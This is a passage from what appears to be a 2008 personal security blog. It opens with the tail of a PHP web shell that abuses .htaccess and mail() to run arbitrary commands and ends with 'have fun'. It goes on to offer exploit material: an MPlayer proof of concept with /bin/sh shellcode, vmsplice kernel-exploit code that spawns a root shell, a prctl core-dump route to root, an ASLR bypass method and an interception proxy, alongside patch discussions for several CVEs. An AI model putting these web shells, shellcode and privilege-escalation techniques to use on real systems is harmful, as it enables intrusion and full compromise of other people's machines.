size=\"50\" value=\"\">
<input type=\"submit\" name=\"sent\"
value=\"Exec\">
</form>
</CENTER></B>";
$htmlend="</BODY>
</HTML>";
$path=dirname($_SERVER["SCRIPT_NAME"]);
if(empty($sh)){
if(empty($_GET['sh'])){
if(empty($_POST['sh'])){
echo $htmlstart.$formtxt;
if(file_exists("./result.txt")){
echo "<center><iframe
src=\"http://".$_SERVER["HTTP_HOST"].
$path."/result.txt\" height=300
width=1000></center>";
}
echo $htmlend;
exit();
} else {
$sh=$_POST['sh'];
}
} else {
$sh=$_GET['sh'];
}
}
if (!$handle = @fopen($htaccess, 'w')) {
echo "Cannot create
".$htaccess."<B>check your rights to this
directory.<P>. exit();";
exit;
}
$syntax="php_value mail.force_extra_parameters '-t
&& ".$sh." >
".dirname(__FILE__)."/result.txt'";
if (fwrite($handle, $syntax) === FALSE) {
echo "Cannot write to file
(".$htaccess.")";
exit;
}
if(!empty($_POST['sent'])){
@mail("", "", "Yeah");
sleep(2);
header("Location:
http://".$_SERVER["HTTP_HOST"].
$_SERVER["REQUEST_URI"]."?cxib=".date('s'));
exit();
}
?>

have fun.

viernes, febrero 22, 2008

Google Adsense is not a serious option

If you are thinking to put a GoogleAdsense, you must know some thinks about them:

If somebody attack your adsenses:
1. Google will close your account
2. Google will take money from your bank account!! They say "We will get the money you have earned"

Well, I suggest avoid google adsense.

miércoles, febrero 13, 2008

MPlayer Security

MPlayer started 2008 the wrong way, 3 dangerous security flaws has been reported.

* CVE-2008-0486 Stack overflow line 229 demux_audio.c
Attack Vector: .mov file header

ptr += 4;
comment = ptr;
+ if (&comment[length] < comments ||
&comment[length] >= &comments[blk_len])
+ return;
c = comment[length];
comment[length] = 0;


* CVE-2008-0629 Overflow stream/g
Attack Vector: Album title

strncpy(album_title, ptr, len);
album_title[len-2]='\0';


The -2 is wrong.


* CVE-2008-0630 Overflow url.c
Attack Vector: Long url will avoid the final \0

The most dangerous scenario is to publish a mp3 with a crafted album name, who listen this mp3 by cddp:// will be infected or reverse-shelled, then with the vmsplice exploit remote root will be

Recommendation: Always the same always, keep your software uptdated and audited!

I'm doing the POC:

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

char sha0code[] =
"\xeb\x16\x5b\x31\xc0"
"\x50\x53\xb0\x0b\x89"
"\xdb\x89\xe1\x31\xd2"
"\xcd\x80\x31\xc0\x40"
"\x31\xdb\xcd\x80\xe8"
"\xe5\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68";

int checkIdent(char *ptr) {
if (ptr[0] == 'T' &&
ptr[1] == 'A' &&
ptr[2] == 'G')
return -1;
else
return 0;
}

int main (int argc, char **argv) {
char *mp3file;
int fd;
int bytes;
int i;
unsigned long map;
char *tag;
char *album;

if (argc != 2) {
printf("USAGE: %s FileToInjectTheExploit.mp3\n",argv[0]);
return 0;
}

//map mp3 to memory
fd = open(argv[1],O_RDWR);
bytes = lseek(fd,0,SEEK_END);
mp3file = (char *)malloc(bytes);
lseek(fd,0,SEEK_SET);
bytes = read(fd,mp3file,bytes);

//look for mp3 tag structure
for (i=bytes; i>100; i--) {
if (checkIdent(i+mp3file)) {
album = mp3file+i+3+30+30;
break;
}
}

//inject the evil string
printf("Album:%s\n",album);
memset(album,0x41,90);

//write changes
lseek(fd,0,SEEK_SET);
write(fd,mp3file,bytes);
close(fd);
free(mp3file);
}

MS08-004 CVE-2008-0084 Windows Vista remote reboot

If the attacker assign the broadcast address to multiples hosts with DHCP requests, the Microsoft Windows Vista's duplicate ip detection algorithm will try to erase the route-table this broadcast, address and then the system is reboted.

Security Fix

domingo, febrero 10, 2008

Linux vmsplice Local Root Exploit

Linux vmsplice syscall let a non-root user inject and execute code to the kernel.

Vulnerable kernels: Linux 2.6.17 - 2.6.24.1

It works ok in my Debian 2.6.18-4-486

The goal is inject this code to the kernel.
This loop, check the task_struct, if a process with the current uid and gid is found, then is setted to zero.
void    kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
exit_kernel();
}
Then a root shell can be spawned:
void exit_code()
{
if (getuid() != 0)
die("wtf", 0);

printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}
kernel_code() is mapped and spliced to a pipe with _vmsplice(pi[1], &iov, 1, 0);
exit_code() is assigned to the SIGPIPE signal.

The Exploit Code.

The problem is at: /fs/splice.c copy_from_user_mmap_sem()

They have solved the problem by adding two access_ok() calls to check the permissions of the page(s) to copy.

The get_iovec_page_array() function, also need this access_ok() check, This monday this patch has been committed.

viernes, febrero 08, 2008

Multi Protocol Proxy

I have improved the visibility of my multi-protocol proxy.

This soft is useful if you want to analyze a protocol, or a daemon. Plug this stuff at the middle, point it to the daemon, and point the client to the proxy.



~ > sha0proxy.pl
/bin/sha0proxy.pl
modes: view trap

At view mode, you can view the comunication.
At trap mode you can interact with the communication.

download sha0proxy

-------- sha0proxy.pl ----------

#Proxy MultiProtocolo
#sha0proxy.pl v0.5 coded by sha0[@]badchecksum[.]net
#Private No distribuir!!
#TODO: capturar SIGINT
# ncurses para modificar los bytes directamente
# udp
# formato shellcode
# logear



#You have to install vncviewer, and the following perl modules:
#perl -MCPAN -e shell
#cpan>install threads
#...
#cpan>install IO::Socket
#...
#cpan>install IO::Select
#...

use IO::Socket;
use IO::Select;
#use Net::UDP;
my %color=(
red=>"\x1b[31;01m",
green=>"\x1b[32;02m",
yellow=>"\x1b[33;01m",
blue=>"\x1b[34;01m",
magenta=>"\x1b[35;01m",
cyan=>"\x1b[36;01m",
white=>"\x1b[37;00m"
);

die "$0 \nmodes: view trap\n" if (@ARGV!=4);
die "Valid modes are: view & trap\n" if ($ARGV[3] ne 'view' && $ARGV[3] ne 'trap');

#my $lport=(int(rand(500))+10000);
my $lport=$ARGV[0];
my $rport=$ARGV[2];
my $rhost=$ARGV[1];
my $buff;
my $vulnerable=0;
my $mode=$ARGV[3];

my $out;
my $in=IO::Socket::INET->new (
LocalAddr=>'0.0.0.0',
LocalPort=>$lport,
Proto=>'tcp',
Listen=>1,
Reuse=>100
) or die "cannot open port $!\n";

print "listening $lport port\n";


#print "\x1b[?25l"; #no cursor

while (my $welcome=$in->accept()) {
$out=IO::Socket::INET->new (
PeerAddr=>$rhost,
PeerPort=>$rport,
Timeout=>20
) or die "cannot connect $!\n";

print "connected to $rhost:$rport\n";
if (!fork()) {
$out->blocking(1);
$welcome->blocking(1);
$out->autoflush(1);
$welcome->autoflush(1);

$s=IO::Select->new($out, $welcome);
proxy:
while(1) {
my @ready = $s->can_read;
foreach my $ready (@ready) {
if($ready == $welcome) {
my $data;
$welcome->recv($data, 8192);
last proxy if (! length($data));
last proxy if(!$out || !$out->connected);
&muestra($data,1);
if ($mode ne 'view') {
print "=>>";
$cmd=;
chomp($cmd);
$data=sprintf(eval("\"$cmd\"")) if (length($cmd));
}
eval { $out->send($data); };
last proxy if $@;
} elsif ($ready == $out) {
my $data;
$out->recv($data, 8192);
last proxy if(!length($data));
last proxy if(!$welcome || !$welcome->connected);
&muestra($data,0);
if ($mode ne 'view') {
print "=<<";
$cmd=;
chomp($cmd);
$data=sprintf(eval("\"$cmd\"")) if (length($cmd));
}
eval { $welcome->send($data); };
last proxy if $@;
}
}#foreach

if (!$welcome || !$out) {
close $out;
close $welcome;
return;
}
}#while 1
} #fork

}
sub muestra {
my $data = $_[0];
my @bytes = split(//,$data);
my $b;
my $alserver = $_[1];
my $count=0;
my $str="";
my $lin=1;
print $color{white};
print ">"x33 if ($alserver);
print "<"x33 if (!$alserver);
print "\n |00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20|";
print "\n---+--------------------------------------------------------------+---\n";

print "000|";
foreach $b (@bytes) {
print $color{green} if (($b ge 'a' && $b le 'z') ||($b ge 'A' && $b le 'Z') || $b eq "\x20");
print $color{blue} if ($b ge '0' && $b le '9');
print $color{red} if ($b eq "\x00");
print $color{cyan} if ($b eq "\x0a" || $b eq "\x0d");
printf "%.2x ",ord($b);
print $color{white};
$b = "." if ($b lt "\x20" || $b gt "\x7e");

$count++;
$str.=$b;
if ($count==21) {

#$str=~s/[^a-z^A-Z^0-9^#^@^:^]/\./ig;

$count = 0;
printf "%s\n%.3d|",$str,$lin;
$lin++;
$str="";
}
}
$str=~s/[^a-z^A-Z^0-9^#^@]/\./ig;
for ($b=$count;$b<21;$b++){
print " ";
}
print $str."\n";
}

viernes, febrero 01, 2008

Xorg stack oveflow privilege scalation

If the user sets more number of visuals than the number of visuals of all screens, then the swap bucle can be abused.

Xext/EVI.c
ProcEVIGetVisualInfo(ClientPtr client)

+ for (i = 0; i < screenInfo.numScreens; i++)
+ total_visuals += screenInfo.screens[i]->numVisuals;
+ if (stuff->n_visual > total_visuals)
+ return BadValue;



more info soon.

jueves, enero 24, 2008

CVE-2008-0001 Privilege scalation exploit.

CVE-2008-0001 Linux Kernel VFS Unauthorized File Access Vulnerability.

Trond changed namei.c code, and implemented a vulnerability on 18 Oct 2005
Bill Roman detected it and solve the problem in the following patch:

--- a/fs/namei.c
+++ b/fs/namei.c
@@ -1576,7 +1576,7 @@ int may_open(struct nameidata *nd, int acc_mode, int flag)
if (S_ISLNK(inode->i_mode))
return -ELOOP;

- if (S_ISDIR(inode->i_mode) && (flag & FMODE_WRITE))
+ if (S_ISDIR(inode->i_mode) && (acc_mode & MAY_WRITE))
return -EISDIR;

error = vfs_permission(nd, acc_mode);
return -EACCES;

flag &= ~O_TRUNC;
- } else if (IS_RDONLY(inode) && (flag & FMODE_WRITE))
+ } else if (IS_RDONLY(inode) && (acc_mode & MAY_WRITE))
return -EROFS;


Well, FMODE_WRITE=2 if we open with O_RDWR (=2) at don't writable file, we will get -EROFS
but we can use O_WRONLY (=1) and != FMODE_WRITE (=2) then we can map the descriptor to memory and write ;)


#drwxr-xr-x 2 root root 4096 2008-01-28 15:46 test
#su - shao

Without write permissions, shao has appended

open("/test", O_WRONLY) = -1 EISDIR (Is a directory)
open("/test", O_RDWR) = -1 EISDIR (Is a directory)
open("/test", O_RDONLY|O_APPEND) = 3

O_APPEND succeed and kernel give us 3rd descriptor.

If we write with write() syscall:

open("/tmp/test", O_RDONLY|O_APPEND) = 3
lseek(3, 0, SEEK_END) = 5
write(3, ptrace: umoven: Input/output error
0x41, 1) = -1 EBADF (Bad file descriptor)
close(3) = 0

write() syscalls return EBADF, he don't let us modify this kind of descriptor, he did a check.
mmap() syscall return -1

Well, from user space we can't exploit this.

martes, enero 15, 2008

hping3 double free security flaw.

Today my friend Mario Diaz have discovered a interesting flaw in hping3, is a race condition + heap overflow dodgy of reproduce.

I love this kind of flaws, let's analyse the problem in order to make the exploit:

pcap_close sometimes cause a double free corruption:

pcap_next(0x8079f20, 0x8069c70, 130, 0, 0) = 0x807a12a
memcpy(0xb33e7970, "", 66) = 0xb33e7970
pcap_next(0x8079f20, 0x8069c70, 66, 0, 0) = 0x807a12a
memcpy(0xb33e7970, "", 66) = 0xb33e7970
pcap_next(0x8079f20, 0x8069c70, 66, 0, 0) = 0x807a12a
memcpy(0xb33e7970, "\252", 130) = 0xb33e7970
pcap_next(0x8079f20, 0x8069c70, 130, 0, 0) = 0x807a12a
--- SIGALRM (Alarm clock) ---
pcap_close(0x8079f20, 0, 0, 0x804eb0d, 0) = 505


When hping sends a packet, if you have specified the -c flag (number of packets) and all packets are sended, a sigalarm is called:


send.c:void send_packet (int signal_id) {
...
sent_pkt++;
Signal(SIGALRM, send_packet);

if (count != -1 && count == sent_pkt) { /* count reached? */
Signal(SIGALRM, print_statistics);
alarm(COUNTREACHED_TIMEOUT);


hping2.h:#define COUNTREACHED_TIMEOUT 1

One second later, a sigalarm is triggered, and print_statistics is called.

statistics.c:print_statistics(int signal_id) {

close_pcap();

I have reproduced the problem:



#include <pcap.h>
#include <stdio.h>

int main (void) {
pcap_t *p;
char *errbuf = (char *)malloc(3000);

if (p = pcap_open_live(NULL,65535,1,3000,errbuf)) {
pcap_close(p);
pcap_close(p);
} else {
printf("open failed\n");
}
}


# ./pcap
*** glibc detected *** double free or corruption (out): 0x0804adc0 ***
Abortado

# ldd -d pcap
linux-gate.so.1 => (0xffffe000)
libpcap.so.0.8 => /usr/lib/libpcap.so.0.8 (0xb7f94000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e63000)
/lib/ld-linux.so.2 (0xb7fd5000)


When the race condition succeed, the pcap_close() is called twice, and then the double-free happens.

miércoles, enero 09, 2008

prctl problems have been solved

In 2.6.22.* and prior we can do a prctl(PR_SET_DUMPABLE,2) then current->mm->dumpable value will be 2.

Let's see the bad check:


--- a/kernel/sys.c
+++ b/kernel/sys.c
@@ -1983,7 +1983,7 @@ asmlinkage long sys_prctl(int option, unsigned long arg2, unsigned long arg3,
error = current->mm->dumpable;
break;
case PR_SET_DUMPABLE:
- if (arg2 < 0 || arg2 > 2) {
+ if (arg2 < 0 || arg2 > 1) {
error = -EINVAL;
break;
}
current->mm->dumpable = arg2;
break;

A non-root user can make an exploit like this and set PR_SET_DUMPABLE to two:

.text
.global main
main:
mov $172, %eax
mov $2, %ebx
int $0x80

Is possible to make a SIGSEGV sgnal to this process and make a core in a directory that the user doesnt have permissions.

One way to get root is make a file in cron.d or fill a disk when only root are quota free, RoManSoFt and Dreyer used this trick in their exploit, see rs-labs.

I estimate that the linux kernel have more bad-checks like that.

domingo, enero 06, 2008

mmap randomization bypass

Todays, people patch their kernels with grsecurity and then is very difficult to exploit his process remotely.

One of grsecurity protection is mmap() randomization, now, every address allocation will be pseudo randomized.


Now, we don't know where the shellcode is, we will have to make some things to diverting the execution flow to our code.

Well we know the local shellcode at environ trick, but it will not usseful with the space layout randomization.

simkin, a friend of badchecksum team, have seen a way to make relative jumps instead of absolute ones.

If you overwrite only one byte of the saved eip, really you are overwriting the two lsb of the address, that means that you can point to relative code where you know what there are.

I say two lsb becouse the null byte of final string will be writed at the second byte when you write the first.

Then you can use pop pop ret or similar tricks to jump to the shellcode without knowing the address of it.

Well, in modern kernels we have stack and heap randomization but have some problems, linux-gate, the new sistem call method, is not randomized, we can use this library to find jumppoints.

jesus@pwn3d:/$ ldd -d /bin/ls
linux-gate.so.1 => (0xffffe000)
librt.so.1 => /lib/i686/cmov/librt.so.1 (0xb7f65000)
libacl.so.1 => /lib/libacl.so.1 (0xb7f5e000)
libselinux.so.1 => /lib/libselinux.so.1 (0xb7f47000)
libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7dfa000)
libpthread.so.0 => /lib/i686/cmov/libpthread.so.0 (0xb7de2000)
/lib/ld-linux.so.2 (0xb7f85000)
libattr.so.1 => /lib/libattr.so.1 (0xb7dde000)
libdl.so.2 => /lib/i686/cmov/libdl.so.2 (0xb7dda000)
libsepol.so.1 => /lib/libsepol.so.1 (0xb7d99000)
jesus@pwn3d:/$ ldd -d /bin/ls
linux-gate.so.1 => (0xffffe000)
librt.so.1 => /lib/i686/cmov/librt.so.1 (0xb7fbe000)
libacl.so.1 => /lib/libacl.so.1 (0xb7fb7000)
libselinux.so.1 => /lib/libselinux.so.1 (0xb7fa0000)
libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7e53000)
libpthread.so.0 => /lib/i686/cmov/libpthread.so.0 (0xb7e3b000)
/lib/ld-linux.so.2 (0xb7fde000)
libattr.so.1 => /lib/libattr.so.1 (0xb7e37000)
libdl.so.2 => /lib/i686/cmov/libdl.so.2 (0xb7e330


I know that there are other tecniques in the wild to bypass PAX protections.